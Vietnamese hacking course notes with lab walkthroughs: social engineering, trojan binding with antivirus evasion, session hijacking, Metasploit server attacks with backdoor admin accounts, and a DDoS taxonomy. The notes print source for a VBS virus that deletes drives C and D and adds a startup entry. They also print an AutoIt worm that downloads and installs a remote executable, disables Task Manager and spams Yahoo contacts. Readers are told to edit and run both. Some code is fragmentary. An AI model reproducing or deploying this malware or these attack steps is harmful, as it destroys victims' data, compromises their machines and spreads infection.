Dưới đây là câu chuyện có thật về một trong những hacker nổi tiếng nhất thế giới trong vài năm trở lại đây - Kevin Mitnick (Mỹ, từng bị 8 năm tù vì tội tấn công vào hệ thống máy tính), chuyên gia hàng đầu về kỹ thuật Social Engineering Lên kế hoạch tấn công vào công ty

X, Kevin vận dụng kỹ năng này để dò tìm thông tin liên quan đến ông tổng giám đốc và một trợ lý của ông này Lợi dụng lúc hai người đi công tác, anh ta sử dụng Call ID giả, nhái giọng nói của viên trợ lý để gọi đến quản trị mạng công ty, yêu cầu gửi mật khẩu đăng nhập vào hệ thống của tổng giám đốc vì ngài đã quên mật khẩu Quản trị viên kiểm tra một vài thông tin về "viên trợ lý", nhưng Kevin đã có đủ thông tin và sự khôn ngoan để trả lời Kết quả là Kevin đã lấy được mật khẩu và kiểm soát toàn bộ hệ thống mạng của công ty X.

Một hình thức lừa đảo khác: Một ngày xấu trời nào đó, bạn nhận được điện thoại, đầu dây bên kia là một giọng nói ngọt ngào: "Chào anh, dịch vụ mà anh đang sử dụng tại công ty chúng tôi hiện đang bị trục trặc với account (tài khoản) của anh Đề nghị anh gửi gấp thông tin về tài khoản cho chúng tôi để điều chỉnh lại" Mới nghe qua tưởng như đây là một kiểu lừa thô thiển, nhưng xác suất thành công rất cao, đặc biệt khi giọng nói đó dễ thương như mấy cô trực tổng đài 1080! Phương cách lừa đảo tương tự là dùng kỹ thuật "Fake Email Login" Về nguyên tắc, mỗi khi đăng nhập vào hộp thư thì chúng ta phải điền thông tin tài khoản gồm username và password rồi gửi thông tin đến mail server để xử lý Lợi dụng điều này, hacker đã thiết kế các trang đăng nhập giả (Fake Login) để các thông tin được gửi đến cho họ.

Tóm lại, kỹ thuật Social Engineering rất đa dạng, phong phú và cũng hết sức nguy hiểm do tính hiệu quả và sự phổ biến Kỹ thuật này không đòi hỏi phải sử dụng quá nhiều yếu tố kỹ thuật, thậm chí không có liên quan đến kỹ thuật thuần túy (non-technical) Hacker có thể thực hiện phương cách này thông qua thư tín, e-mail, điện thoại, tiếp xúc trực tiếp, thông qua người quen, các mối quan hệ cá nhân nhằm dẫn dụ, khai thác các thông tin do vô tình bị tiết lộ từ phía người dùng Ở VN, kỹ thuật này còn khá mới nên không hiếm trường hợp bị đánh lừa một cách dễ dàng Chẳng hạn năm ngoái, hàng loạt game thủ MU Global đã mất sạch sành sanh tài sản (ảo), khi ngây thơ điền thông tin tài khoản của mình vào một e-mail giả mạo admin MU của hacker!

Bài Lab 1: Gửi email nặc đính kèm Trojan Để thực hiện bài Lab này, ta sử dụng chương trình Mini-binder để ghép file trojan với hình ảnh, thay đổi icon và chương trình Outlook để gửi email nặc danh.

Ghép file hình ảnh và file trojan, đầu tiên ta tạo 1 file trojan, lấy 1 file ảnh và file ico bất kỳ để ghép.

Ta sử dụng lệnh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ để ghép file trojan svchost.exe với cathu.jpg và với icon là 60.ico.

Tiếp theo, ta nén file trojan mới bằng Winrar lại nhiều lấn để tránh chương trình Anti-virus (tùy theo phiên bản Anti-virus, tuy nhiên hầu hết các trojan không qua mặt được các chương trình này) và thay đổi thông tin của outlook.

Ta vào ToolOptionMail setupView Account Chọn Account cần thay đổi và thay đổi thông tin Your Name và E-mail Address.

Tiếp theo Attach file đính kèm vào và gởi Email đi Trong bài Tác giả gởi tới địa chỉ email ma i lte st sni ff@ya hoo com, và sau đó check mail để kiểm tra thử xem mail đã đến chưa.

Như ta đã biết về sniffer (nghe lén trong mạng), Hacker có thể lấy bất kỳ thông tin gì không được mã hóa, hay có thể fake CA để có thể lấy thông tin trong giao thức HTTPS, bây giờ ta có thêm 1 kỹ thuật nữa là session hijacking Để thực hiện được bài lab này trước tiên ta phải sử dụng ARP spoof, sau đó sử dụng phần mềm T-sight hay Hunt để giành lấy session từ phía máy nạn nhân.

II/ Thực hiện bài Lab

Trong bài Lab, tác giả sử dụng Vmware để thực hiện, sử dụng máy để thử nghiệp TELNET và SSH Còn 2 máy còn lại 1 sử dụng Window 2000(đã cài sẵn tool T-sight) và 1 sử Linux để test SSH.

Việc cài đặt phần mềm khá dễ dàng, bạn cần phải thêm phần driver và chuyển về IP

192.168.200.0/24 do đang sử dụng bản Trial.

Sau khi cài đặt xong, trên máy 192.168.200.1 thiết lập cho phép các máy khác telnet Và từ máy 192.168.200.2 telnet đến máy 192.168.200.1.

Và dữ liệu thu được từ máy 192.168.200.2, sử dụng tính năng Take Over trong ToolT-sight để lấy session.

Sau khi Session bị lấy, session từ máy Telnet sẽ bị “ Lost connection” và người sử dụng trong trường hợp này không biết là mình bị “Lost Connection “bởi nguyên nhân nào Bây giờ ta bật Service SSH của máy Linux bằng lệnh “ Service sshd” và test thử session hijacking đối với traffic ssh

Thông thường để Hacking 1 Web Server, Hacker thường phải xem thử Web Server đang chạy hệ điều hành gì và chạy những sercice gì trên đó, hệ điều hành thông thường là các hệ điều hành Win 2000 Server, Win 2003 Server, Redhat.v.v Các Service bao gồm Apache, IIS, FTP Server v.v Nếu như 1 trong những Service của Hệ điều hành bị lỗi hay service khác bị lỗi có thể dẫn tới việc mất quyền kiểm soát của hệ thống Trong bài thực hành của phần này, tác giả giới thiệu lỗi của hệ điều hành là DCOM và lỗi ứng dụng khác là Server-U, Apache(FTP Server) Từ những lỗi này, ta có thể kiểm soát hoàn toàn máy nạn nhân.

II/ Thực Hiện bài lab

Bài Lab 1: Tấn công Web Server Win 2003(lỗi Apache) Để biết được máy Server của hệ thống có bị lỗi hay không, ta sử dụng dụng phần mềm quét để kiểm tra (Phần này đã được học trong scaning).

2 ASN.1 Vulnerability Could Allow Code Execution 1

5 No Remote Registry Access Available 1

8 Windows RPC Cumulative Patch 828741 Remote 1

9 Windows RPC DCOM interface buffer overflow 1

10 Windows RPC DCOM multiple vulnerabilities 1

13 Apache mod_alias and mod_rewrite Buffer Overflow 1

Ta không thấy thông tin về FTP Server ở đây, do phần mềm Retina chỉ có tính năng nhận diện các Service của Microsoft và những Service thông dụng Còn các Service không thông dụng hơn thì phần mềm chỉ thấy dưới dạng mở port Trong trường hợp này ta thấy mở port 21

Ta sử dụng Metasploit để khai thác lỗi Apache và lấy được (Console)

Bây giờ chúng ta sẽ tìm cách Remote Desktop vào máy 192.168.200.1 Trước tiên ta tạo 1 user và add user này vào nhóm admin bằng sử dụng lệnh.

Net user vsichao vsichao /add

Net Localgroup Administrators vsichao /add

//đưa user vào nhóm Admin

Ta có thể kiểm ta lại bằng lệnh “Net user” để kiểm tra thử user của mình đã được quyền admin hay chưa.

Tiếp theo ta thử remote Desktop vào máy bằng lệnh “ mstsc /v 192.168.200.6” Nếu không được ta sử dụng file Openrdp.vbs để mở Remote Desktop Ta sử dụng chương trình Cisco TFTP Server để đẩy file này Server nạn nhân.

Sử dụng lệnh tftp ở máy nạn nhân để lấy file

Add user vào và nâng quyền lên Administrator

Remote Desktop vào với user là cehclass thành công, như vậy ta đã hoàn toàn kiểm soát được máy nạn nhân

Bài lab 2: Khai thác lỗi ứng dụng Server U

Tương tự như bài trên, ta sử dụng chương trinh nmap để xác định version của ServerU và sử dụng metaesploit để tấn công.

Virus phá hủy dữ liệu máy

Ta có thể viết dễ dàng 1 virus phá hủy máy bằng những hàm Format hay delete trong ngôn ngữ VBS như sau: msgbox"Error !"

Set vip_xinh = Createobject("scripting.filesystemobject") vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs" Set vip_xinh2= CreateObject("WScript.Shell") vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"

On Error Resume Next Const vic = "D:\" Delvic

Set fso = CreateObject("Scripting.FileSystemObject") fso.DeleteFile vic & "*.*", True fso.DeleteFolder vic & "*", True End Sub

Set fso1 = CreateObject("Scripting.FileSystemObject") fso1.DeleteFile vic1 & "*.*", True fso1.DeleteFolder vic1 & "*", True End Sub

Set fso2 = CreateObject("Scripting.FileSystemObject") fso2.DeleteFile vic2 & "*.*", True fso2.DeleteFolder vic2 & "*", True

Set treomay= CreateObject("WScript.Shell")

Do treomay.run "notepad",false loop Ở đây ta thực hiện vòng lặp nhiều lần và xóa những thông tin trên ở C và D, các bạn có save đoạn Script này thành file vbs và sau đó chạy đoạn script này.

Lúc này ta mở rất nhiều chương trình notepad.exe và máy sẽ bị lỗi.

Ta khởi động lại máy bằng cách sử dụng reset nhưng do thông tin ở ổ C đã bị xóa nên máy tính sẽ không khởi động lại được, như vậy máy tính nhiểm virus đã bị phá hủy hoàn toàn.

Virus gaixinh lây qua tin nhắn

Ta phân tích code được viết bằng AUTO IT như sau

;

; Tac Gia: Kevin Duong - KVD

; Cong Dung: Quang cao Website thong qua Y!M

; Lay Nhiem Vao He Thong

If Not FileExists(@WindowsDir & "\taskmng.exe") Then

InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1) Sleep(5000)

RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet

Explorer\Control Panel", "Homepage", "REG_DWORD", "1")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\ System", "DisableRegistryTools", "REG_DWORD", "1")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz","content url", "REG_SZ", $website)

RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\

YMSGR_Launchcast","content url", "REG_SZ", $website)

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir &

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community:: Chut gi de nho ")

; Danh Sach Tin Nhan Ngau Nhien

$tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang " & $website & " "

$tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang " & $website & " "

$tin[2] = "Om bau dau thuong, minh anh co don chon day Ngay mai em ra di, chon giau bao ky niem " & $website & " "

$tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa Anh khong quay ve day, loi nao anh noi da quen " & $website & " "

$tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao " & $website & " "

$tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay Gio day chi la nhung ky niem buon " & $website &

$tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon Nguoi da den nhu la giac mo roi ra di cho anh bat ngo " & $website & " "

$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi " & $website & " "

$tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa " & $website & " "

$tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan Ve dau toi biet di ve dau? " & $website & " "

; Ham Thay Doi Status & Gui Tin Nhan

$kiemtra = WinExists ($tieude) If $kiemtra = 1 Then

$ngaunhien = Random(0,9,1) ClipPut($tin[$ngaunhien]) BlockInput (1) WinActivate($tieude) Send("!m")

Send("^{SHIFTDOWN}{END}{SHIFTUP}") Send("{ENTER}")

;

Dựa vào đoạn code này, ta có thể edit lại theo ý của mình, sau đó sử dụng tool AutoIT để chuyển script này sang file.exe và thực thi.

Sau đó chạy file exe và login vào Yahoo để kiểm tra, ta thấy tin nhắn gởi rất nhiều, nếu như chúng ta set tham số sleep càng bé (khoảng 3000) thì lưu lượng gởi rất là nhanh và nhiều. Để có thể lây được qua tin nhắn, chúng ta phải đính kèm virus vào website, hay bằng cách nào đó để máy nạn nhân chạy file exe vừa được tạo ra.

Trong các lĩnh vực an ninh máy tính và lập trình, một lỗi tràn bộ nhớ đệm hay gọi tắt là lỗi tràn bộ đệm là một lỗi lập trình có thể gây ra một ngoại lệ truy nhập bộ nhớ máy tính và chương trình bị kết thúc, hoặc khi người dùng có ý phá hoại, họ có thể lợi dụng lỗi này để phá vỡ an ninh hệ thống.

Lỗi tràn bộ đệm là một điều kiện bất thường khi một tiến trình lưu dữ liệu vượt ra ngoài biên của một bộ nhớ đệm có chiều dài cố định Kết quả là dữ liệu đó sẽ đè lên các vị trí bộ nhớ liền kề.

Dữ liệu bị ghi đè có thể bao gồm các bộ nhớ đệm khác, các biến và dữ liệu điều khiển luồng chạy của chương trình (program flow control).

Các lỗi tràn bộ đệm có thể làm cho một tiến trình đổ vỡ hoặc cho ra các kết quả sai Các lỗi này có thể được kích hoạt bởi các dữ liệu vào được thiết kế đặc biệt để thực thi các đoạn mã phá hoại hoặc để làm cho chương trình hoạt động một cách không như mong đợi Bằng cách đó, các lỗi tràn bộ đệm gây ra nhiều lỗ hổng bảo mật (vulnerability) đối với phần mềm và tạo cơ sở cho nhiều thủ thuật khai thác (exploit) Việc kiểm tra biên (bounds checking) đầy đủ bởi lập trình viên hoặc trình biên dịch có thể ngăn chặn các lỗi tràn bộ đệm.

Một lỗi tràn bộ nhớ đệm xảy ra khi dữ liệu được viết vào một bộ nhớ đệm, mà do không kiểm tra biên đầy đủ nên đã ghi đè lên vùng bộ nhớ liền kề và làm hỏng các giá trị dữ liệu tại các địa chỉ bộ nhớ kề với vùng bộ nhớ đệm đó Hiện tượng này hay xảy ra nhất khi sao chép một xâu ký tự từ một bộ nhớ đệm này sang một vùng bộ nhớ đệm khác.

Trong ví dụ sau, một chương trình đã định nghĩa hai phần tử dữ liệu kề nhau trong bộ nhớ: A là một bộ nhớ đệm xâu ký tự dài 8 bytes, và B là một số nguyên kích thước 2 byte Ban đầu, A chỉ chứa toàn các byte giá trị 0, còn B chứa giá trị 3 Các ký tự có kích thước 1 byte.

Bây giờ, chương trình ghi một xâu ký tự "excessive" vào bộ đệm A, theo sau là một byte 0 để đánh dấu kết thúc xâu Vì không kiểm tra độ dài xâu, nên xâu ký tự mới đã đè lên giá trị của B:

DISTRIBUTED DENIAL OF SERVICE(DDOS)

Tác hại của DdoS

Ngày 7/3/2000, yahoo.com đã phải ngưng phục vụ hàng trăm triệu user trên toàn thế giới nhiều giờ liền Vài giờ sau, Yahoo đã tìm ra nguyên nhân gây nên tình trạng này, họ đang phải gánh chịu một đợt tấn công DDoS với quy mô vài ngàn máy tính liên tục gửi hàng triệu request đến các server dịch vụ làm các server này không thể phục vụ các user thông thường khác Vài ngày sau, một sự kiện tương tự diễn ra nhưng có phần “ồn ào” hơn do một trong các nạn nhân mới là hãng tin CNN, amazon.com, buy.com, Zdnet.com, E-trade.com, Ebay.com Tất cả các nạn nhân là những gã khổng lồ trên internet thuộc nhiều lĩnh vực khác nhau Theo Yankke Group, tổng thiệt hại do cuộc tấn công lên đến 1.2 triệu USD, nhưng không đáng kể bằng sự mất mát về lòng tin của khách hàng, uy tín của các công ty là không thể tính được.

Làm đảo lộn mọi dự tính, thủ phạm là một cậu bé 15 tuổi người Canada, với nickname

“mafiaboy” Lại là một thiên tài bẩm sinh như Kevin Mitnick xuất hiện? Không Mafiaboy chỉ tìm tòi và download về một số chương trình công cụ của các hacker Cậu đã dùng một công cụ DDos có tên là TrinOO để gây nên các cuộc tấn công kiểu DDoS khủng khiếp trên Một điểm đáng lưu ý khác là Mafiaboy bị bắt do tự khoe khoang trên các chatroom công cộng, không ai tự truy tìm được dấu vết của cậu bé này.

Còn rất nhiều gã khổng lồ khác đã gục ngã dưới các cuộc tấn công kiểu DDoS sau đó, trong đó có cả Microsodt Tuy nhiên cuộc tấn công trên là điển hình nhất về DDoS, nó nói lên một đặc điểm chết người của DDoS: “Rất dễ thực hiện, hầu như không thể tránh, hậu quả rất nặng nề”.

Các giai đoạn của một cuộc tấn công kiểu DdoS

- Chuẩn bị công cụ quan trọng của cuộc tấn công, công cụ này thông thường hoạt động theo mô hình client-server Hacker có thể viết phần mềm này hay down load một cách dễ dàng, theo thống kê tạm thời có khoảng hơn 10 công cụ DDoS được cung cấp miễn phí trên mạng (các công cụ này sẽ phân tích chi tiết vào phần sau)

- Kế tiếp, dùng các kỹ thuật hack khác để nắm trọn quyền một số host trên mạng tiến hành cài đặt các software cần thiết trên các host này, việc cấu hình và thử nghiệm toàn bộ attack-netword (bao gồm mạng lưới các máy đã bị lợi dụng cùng với các software đã được thiết lập trên đó, máy của hacker hoặc một số máy khác đã được thiết lập như điểm phát động tấn công) cũng sẽ được thực hiện trong giai đoạn này.

2.2 Giai đoạn xác định mục tiêu và thời điểm:

Communication Secret/private channel Public channel

TCP UDP ICMP TCP UDP ICMP

- Sau khi xác định mục tiêu lấn cuối, hacker sẽ có hoạt động điều chỉnh attack-netword chuyển hướng tấn công về phía mục tiêu.

- Yếu tố thời điểm sẽ quyết định mức độ thiệt hại và tốc độ đáp ứng của mục tiêu đối với cuộc tấn công.

2.3 Phát động tấn công và xóa dấu vết: Đúng thời điểm đã định, hacker phát động tấn công từ máy của mình, lệnh tấn công này có thể đi qua nhiều cấp mói đến host thực sự tấn công Toàn bộ attack-network (có thể lên đến hàng ngàn máy), sẽ vắt cạn năng lực của server mục tiêu liên tục, ngăn chặn không cho nó hoạt động như thiết kế.- Sau một khoảng thời gian tấn công thích hợp, hacker tiến hành xóa mọi dấu vết có thể truy ngược đến mình, việc này đòi hỏi trình độ khác cao và không tuyệt đối cần thiết.

Kiến trúc tổng quan của DDoS attack-network

Nhìn chung DDoS attack-network có hai mô hình chính:

Dưới đây là sơ đồ chính phân loại các kiểu tấn công DDoS

Theo mô hình này, attack-network gồm 3 thành phần: Agent, Client và Handler

 Client : là software cơ sở để hacker điều khiển mọi hoạt động của attack-network

 Handler : là một thành phần software trung gian giữa Agent và Client

 Agent : là thành phần software thực hiện sự tấn công mục tiêu, nhận điều khiển từ Client thông qua các Handler

Kiến trúc attack-network kiểu Agent – Handler

Agent Agent Agent Agent Agent

Attacker sẽ từ Client giao tiếp với cc1 Handler để xác định số lượng Agent đang online, điều chỉnh thời điểm tấn công và cập nhật các Agent Tùy theo cách attacker cấu hình attack-network, các Agent sẽ chịu sự quản lý của một hay nhiều Handler.

Thông thường Attacker sẽ đặt Handler software trên một Router hay một server có lượng traffic lưu thông nhiều Việc này nhằm làm cho các giao tiếp giữa Client, handler và Agent khó bị phát hiện Các gia tiếp này thông thường xảy ra trên các protocol TCP, UDP hay ICMP Chủ nhân thực sự của các Agent thông thường không hề hay biết họ bị lợi dụng vào cuộc tấn công kiểu DDoS, do họ không đủ kiến thức hoặc các chương trình Backdoor Agent chỉ sử dụng rất ít tài nguyên hệ thống làm cho hầu như không thể thấy ảnh hưởng gì đến hiệu năng của hệ thống.

Internet Relay Chat (IRC) là một hệ thống online chat multiuser, IRC cho phép User tạo một kết nối đến multipoint đến nhiều user khác và chat thời gian thực Kiến trúc củ IRC network bao gồm nhiều IRC server trên khắp internet, giao tiếp với nhau trên nhiều kênh (channel) IRC network cho phép user tạo ba loại channel: public, private và serect.

 Public channel: Cho phép user của channel đó thấy IRC name và nhận được message của mọi user khác trên cùng channel

 Private channel: được thiết kế để giao tiếp với các đối tượng cho phép Không cho phép các user không cùng channel thấy IRC name và message trên channel Tuy nhiên, nếu user ngoài channel dùng một số lệnh channel locator thì có thể biết được sự tồn tại của private channel đó.

 Secrect channel : tương tự private channel nhưng không thể xác định bằng channel locator.

Kiến trúc attack-network của kiểu IRC-Base

Agent Agent Agent Agent Agent

IRC – Based net work cũng tương tự như Agent – Handler network nhưng mô hình này sử dụng các kênh giao tiếp IRC làm phương tiện giao tiếp giữa Client và Agent (không sử dụng Handler) Sử dụng mô hình này, attacker còn có thêm một số lợi thế khác như:

+ Các giao tiếp dưới dạng chat message làm cho việc phát hiện chúng là vô cùng khó khăn + IRC traffic có thể di chuyển trên mạng với số lượng lớn mà không bị nghi ngờ

+ Không cần phải duy trì danh sách các Agent, hacker chỉ cần logon vào IRC server là đã có thể nhận được report về trạng thái các Agent do các channel gửi về.

+ Sau cùng: IRC cũng là một môi trường file sharing tạo điều kiện phát tán các Agent code lên nhiều máy khác.

II/ PHÂN LOẠI TẤN CÔNG KIỂU DDOS

Nhìn chung, có rất nhiều biến thể của kỹ thuật tấn công DDoS nhưng nếu nhìn dưới góc độ chuyên môn thì có thể chia các biến thề này thành hai loại dựa trên mụch đích tấn công: Làm cạn kiệt băng thông và làm cạn kiệt tài nguyên hệ thống Dưới đây là sơ đồ mô tả sự phân loại các kiểu tấn công DDoS.

Những kiểu tấn công làm cạn kiệt băng thông của mạng (BandWith Depletion Attack)

BandWith Depletion Attack được thiết kế nhằm làm tràng ngập mạng mục tiêu với những traffic không cần thiết, với mục địch làm giảm tối thiểu khả năng của các traffic hợp lệ đến được hệ thống cung cấp dịch vụ của mục tiêu.

Có hai loại BandWith Depletion Attack:

+ Flood attack: Điều khiển các Agent gởi một lượng lớn traffic đến hệ thống dịch vụ của mục tiêu, làm dịch vụ này bị hết khả năng về băng thông.

+ Amplification attack: Điều khiển các agent hay Client tự gửi message đến một địa chỉ IP broadcast, làm cho tất cả các máy trong subnet này gửi message đến hệ thống dịch vụ của mục tiêu. Phương pháp này làm gia tăng traffic không cần thiết, làm suy giảm băng thông của mục tiêu.

Trong phương pháp này, các Agent sẽ gửi một lượng lớn IP traffic làm hệ thống dịch vụ của mục tiêu bị chậm lại, hệ thống bị treo hay đạt đến trạng thái hoạt động bão hòa Làm cho các User thực sự của hệ thống không sử dụng được dịch vụ.

Ta có thể chia Flood Attack thành hai loại:

+ UDP Flood Attack: do tính chất connectionless của UDP, hệ thống nhận UDP message chỉ đơn giản nhận vào tất cả các packet mình cần phải xử lý Một lượng lớn các UDP packet được gởi đến hệ thống dịch vụ của mục tiêu sẽ đẩy toàn bộ hệ thống đến ngưỡng tới hạn.

+ Các UDP packet này có thể được gửi đến nhiều port tùy ý hay chỉ duy nhất một port Thông thường là sẽ gửi đến nhiều port làm cho hệ thống mục tiêu phải căng ra để xử lý phân hướng cho các packet này Nếu port bị tấn công không sẵn sàng thì hệ thống mục tiêu sẽ gửi ra một ICMP packet loại “destination port unreachable” Thông thường các Agent software sẽ dùng địa chỉ IP giả để che giấu hành tung, cho nên các message trả về do không có port xử lý sẽ dẫn đến một đại chỉ Ip

Amplifier Network System khác UDP Flood attack cũng có thể làm ảnh hưởng đến các kết nối xung quanh mục tiêu do sự hội tụ của packet diễn ra rất mạnh.

+ ICMP Flood Attack: được thiết kế nhằm mục đích quản lý mạng cũng như định vị thiết bị mạng Khi các Agent gởi một lượng lớn ICMP_ECHO_REPLY đến hệ thống mục tiêu thì hệ thống này phải reply một lượng tương ứng Packet để trả lời, sẽ dẫn đến nghẽn đường truyền Tương tự trường hợp trên, địa chỉ IP của cá Agent có thể bị giả mạo.

Amplification Attack nhắm đến việc sử dụng các chức năng hỗ trợ địa chỉ IP broadcast của các router nhằm khuyếch đại và hồi chuyển cuộc tấn công Chức năng này cho phép bên gửi chỉ định một địa chỉ IP broadcast cho toàn subnet bên nhận thay vì nhiều địa chỉ Router sẽ có nhiệm vụ gửi đến tất cả địa chỉ IP trong subnet đó packet broadcast mà nó nhận được.

Attacker có thể gửi broadcast message trực tiếp hay thông qua một số Agent nhằm làm gia tăng cường độ của cuộc tấn công Nếu attacker trực tiếp gửi message, thì có thể lợi dụng các hệ thống bên trong broadcast network như một Agent.

Có thể chia amplification attack thành hai loại, Smuft va Fraggle attack:

+ Smuft attack: trong kiểu tấn công này attacker gởi packet đến network amplifier (router hay thiết bị mạng khác hỗ trợ broadcast), với địa chỉ của nạn nhân Thông thường những packet được dùng là ICMP ECHO REQUEST, các packet này yêu cầu yêu cầu bên nhận phải trả lời bằng một

ICMP ECHO REPLY packet Network amplifier sẽ gửi đến ICMP ECHO REQUEST packet đến tất cả các hệ thống thuộc địa chỉ broadcast và tất cả các hệ thống này sẽ REPLY packet về địa chỉ IP của mục tiêu tấn công Smuft Attack.

+ Fraggle Attack: tương tự như Smuft attack nhưng thay vì dùng ICMP ECHO REQUEST packet thì sẽ dùng UDP ECHO packet gởi đếm mục tiêu Thật ra còn một biến thể khác của Fraggle attack sẽ gửi đến UDP ECHO packet đến chargen port (port 19/UNIX) của mục tiêu, với địa chỉ bên gửi là echo port (port 7/UNIX) của mục tiêu, tạo nên một vòng lặp vô hạn Attacker phát động cuộc tấn công bằng một ECHO REQUEST với địa chỉ bên nhận là một địa chỉ broadcast, toàn bộ hệ thống thuộc địa chỉ này lập tức gửi REPLY đến port echo của nạn nhân, sau đó từ nạn nhân mộtECHO REPLY lại gửi trở về địa chỉ broadcast, quá trình cứ thế tiếp diễn Đây chính là nguyên nhânFlaggle Attack nguy hiểm hơn Smuft Attack rất nhiều.

Những kiểu tấn công làm cạn kiệt tài nguyên: (Resource Deleption Attack)

Theo định nghĩa: Resource Deleption Attack là kiểu tấn công trong đó Attacker gởi những packet dùng các protocol sai chức năng thiết kế, hay gửi những packet với dụng ý làm tắt nghẽn tài nguyên mạng làm cho các tài nguyên này không phục vụ user thông thường khác được.

+ TCP SYS Attack: Transfer Control Protocol hỗ trợ truyền nhận với độ tin cậy cao nên sử dụng phương thức bắt tay giữa bên gởi và bên nhận trước khi truyền dữ liệu Bước đầu tiên, bên gửi gởi một SYN REQUEST packet (Synchronize) Bên nhận nếu nhận được SYN REQUEST sẽ trả lời bằng SYN/ACK REPLY packet Bước cuối cùng, bên gửi sẽ truyên packet cuối cùng ACK và bắt đầu truyền dữ liệu.

Nếu bên server đã trả lời một yêu cầu SYN bằng một SYN/ACK REPLY nhưng không nhận được ACK packet cuối cùng sau một khoảng thời gian quy định thì nó sẽ resend lại SYN/ACKREPLY cho đến hết thời gian timeout Toàn bộ tài nguyên hệ thống “dự trữ” để xử lý phiên giao tiếp nếu nhận được ACK packet cuối cùng sẽ bị “phong tỏa” cho đến hết thời gian timeout.

SYS packet with a deliberately fraudulent (spoofed) source IP return address

Nắm được điểm yếu này, attacker gởi một SYN packet đến nạn nhân với địa chỉ bên gởi là giả mạo, kết quả là nạn nhân gởi SYN/ACK REPLY đến một địa chỉ khá và sẽ không bao giờ nhận được ACK packet cuối cùng, cho đến hết thời gian timeout nạn nhân mới nhận ra được điều này và giải phóng các tài nguyên hệ thống Tuy nhiên, nếu lượng SYN packet giả mạo đến với số lượng nhiều và dồn dập, hệ thống của nạn nhân có thể bị hết tài nguyên.

+ PUSH = ACK Attack: Trong TCP protocol, các packet được chứa trong buffer, khi buffer đầy thì các packet này sẽ được chuyển đến nơi cần thiết Tuy nhiên, bên gởi có thể yêu cầu hệ thống unload buffer trước khi buffer đầy bằng cách gởi một packet với PUSH và ACK mang giá trị là 1. Những packet này làm cho hệ thống của nạn nhân unload tất cả dữ liệu trong TCP buffer ngay lập tức và gửi một ACK packet trở về khi thực hiện xong điều này, nếu quá trình được diễn ra liên tục với nhiều Agent, hệ thống sẽ không thể xử lý được lượng lớn packet gửi đến và sẽ bị treo.

Malformed Packet Attack là cách tấn công dùng các Agent để gởi các packet có cấu trúc không đúng chuẩn nhằm làm cho hệ thống của nạn nhân bị treo.

Có hai loại Malformed Packet Attack:

+ IP address attack: dùng packet có địa chỉ gởi và nhận giống nhau làm cho hệ điều hành của nạn nhân không xử lý nổi và bị treo.

+ IP packet options attack ngẫu nhiên hóa vùng OPTION trong IP packet và thiết lập tất cả các bit QoS lên 1, điều này làm cho hệ thống của nạn nhân phải tốn thời gian phân tích, nếu sử dụng số lượng lớn Agent có thể làm hệ thống nạn nhân hết khả năng xử lý.

3/ Một số đặc tính của công cụ DdoS attack:

Actively Poll Live&wait TCP UDP ICMP

Có rất nhiều điểm chung về mặt software của các công cụ DDoS attack Có thể kể ra một số điểm chung như: cách cài Agent software, phương pháp giao tiếp giữa các attacker, handler và Agent, điểm chung về loại hệ điều hành hỗ trợ các công cụ này Sơ đồ trên mô tả sự so sánh tương quan giữa các công cụ tấn công DDoS này.

3.1/ Cách thức cài đặt DDoS Agent:

Attacker có thể dùng phương pháp active và passive để cài đặt agent software lên các máy khác nhằm thiết lập attack-network kiểu Agent-Handler hay IRC-based.

+ Scaning: dùng các công cụ như Nmap, Nessus để tìm những sơ hở trên các hệ thống đang online nhằm cài đặt Agentsoftware Chú ý, Nmap sẽ trả về những thông tin về một hệ thống đã được chỉ định bằng địa chỉ IP, Nessus tìm kiếm từ những địa chỉ IP bất kỳ về một điểm yếu biết trước nào đó.

+ Backdoor: sau khi tìm thấy được danh sách các hệ thống có thể lợi dụng, attacker sẽ tiến hành xâm nhập và cài Agentsoftware lên các hệ thống này Có rất nhiều thông tin sẵn có về cách thức xâm nhập trên mạng, như site của tổ chức Common Vulnerabilities and Exposures (CVE), ở đây liệt kê và phân loại trên 4.000 loại lỗi của tất cả các hệ thống hiện có Thông tin này luôn sẵn sàng cho cả giới quản trị mạng lẫn hacker.

+ Trojan: là một chương trình thực hiện một chức năng thông thường nào đó, nhưng lại có một số chức năng tiềm ẩn phục vụ cho mục đích riêng của người viết mà người dùng không thể biết được Có thể dùng trojan như một Agent software.

